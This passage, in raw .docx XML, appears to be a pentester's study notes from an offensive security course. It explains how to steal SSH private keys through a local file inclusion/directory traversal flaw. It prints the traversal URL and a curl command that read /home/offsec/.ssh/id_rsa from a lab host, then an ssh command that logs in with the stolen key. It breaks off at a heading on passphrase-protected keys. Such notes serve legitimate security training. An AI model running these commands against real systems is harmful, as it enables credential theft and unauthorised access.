    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CBF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1157"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Once the SSH connection is established, keep the terminal session open, as it acts as the forwarding tunnel. If you close the SSH session, the forwarding will stop.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CC0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CC1">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CC2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Access PostgreSQL Locally</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CC3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now, on your local machine, you can interact with PostgreSQL as if it's running on localhost:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CC4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="382"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">psql -h localhost -p 5432 -U postgres</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CC5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C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C7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CC8">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_o68uen423khc" w:id="111"/>
      <w:bookmarkEnd w:id="111"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Stealing SSH keys</w:t>
      </w:r>
    </w:p>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="935"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Always remember to put a trailing line at the end of private key if you copy and paste</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CCB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="935"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Always put </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chmod 600 id_rsa</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> before you run it!</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CCC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CCD">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_jzsyrftvgg8r" w:id="112"/>
      <w:bookmarkEnd w:id="112"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Stealing SSH keys via LFI</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CCE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We saw one example of stealing SSH keys using LFI in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId261">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">DVR4</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CCF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From the XXXXXXXXX course (in section 9.1.2. Identifying and Exploiting Directory Traversals), we learned about how we can use LFI to steal SSH and how to format it:</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">SSH keys are usually located in the home directory of a user in the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.ssh</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> folder. Fortunately for us, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/passwd</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> also contains the home directory paths of all users, as shown in Figure 6. The output of </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/passwd</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> shows a user called </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">offsec</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Let's specify a relative path for the vulnerable "page" parameter to try and display the contents of the user's private key.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CD2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">http://mountaindesserts.com/meteor/index.php?page=../../../../../../../../../home/offsec/.ssh/id_rsa</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CD3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CD4">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="600" w:right="600" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Listing 8 - Entire URL of our Directory Traversal attack</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CD5">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Let's copy the shown URL from listing 8 into the address bar of our browser.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CD6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2959100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Figure 7: Content of SSH Private Key" id="248" name="image256.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="Figure 7: Content of SSH Private Key" id="0" name="image256.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId262"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2959100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Figure 7: Content of SSH Private Key</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CD7">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 7 shows that we successfully retrieved the private key for the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">offsec</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> user. Reviewing the output, we'll notice that its formatting is a bit messy.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CD8">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">During web application assessments, we should understand that as soon as we've identified a possible vulnerability, such as with the "page" parameter in this case, we should not rely on a browser for testing. Browsers often try to parse or optimize elements for user friendliness. When performing web application testing, we should mainly use tools such as</w:t>
      </w:r>
      <w:hyperlink r:id="rId263">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId264">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Burp</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:hyperlink r:id="rId265">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId266">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">cURL</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, or a programming language of our choice.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CD9">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Let's use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to retrieve the SSH private key as we did with the browser.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CDA">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">kali@kali:~$ curl http://mountaindesserts.com/meteor/index.php?page=../../../../../../../../../home/offsec/.ssh/id_rsa</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CDB">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:right="600"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3327400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="116" name="image110.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image110.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId267"/>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CDC">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Listing 9 shows that the SSH private key is formatted better using </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> than in the browser. However, the HTML code of the web page is returned in the output as well. Let's copy the SSH private key beginning at </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-----BEGIN OPENSSH PRIVATE KEY-----</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and ending at </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-----END OPENSSH PRIVATE KEY-----</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> from the terminal and paste it into a file called </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">dt_key</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the home directory for the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">kali</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> user.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CDD">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Let's use the private key to connect to the target system via SSH on port 2222. We can use the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-i</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> parameter to specify the stolen private key file and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-p</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to specify the port. Before we can use the private key, we'll need to modify the permissions of the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">dt_key</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file so that only the user / owner can read the file; if we don't, the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ssh</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> program will throw an error stating that the access permissions are too open.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CDE">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">kali@kali:~$ ssh -i dt_key -p 2222 offsec@mountaindesserts.com</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CDF">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:right="600"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3327400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="503" name="image491.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image491.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId26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CE0">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:right="600"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CE1">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:right="600"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If the SSH private key is protected by a passphrase, then look below:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CE2">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:right="600"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-------------------------------------------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CE3">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:right="600"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_yf3ye7obe2o4" w:id="113"/>
      <w:bookmarkEnd w:id="113"/>
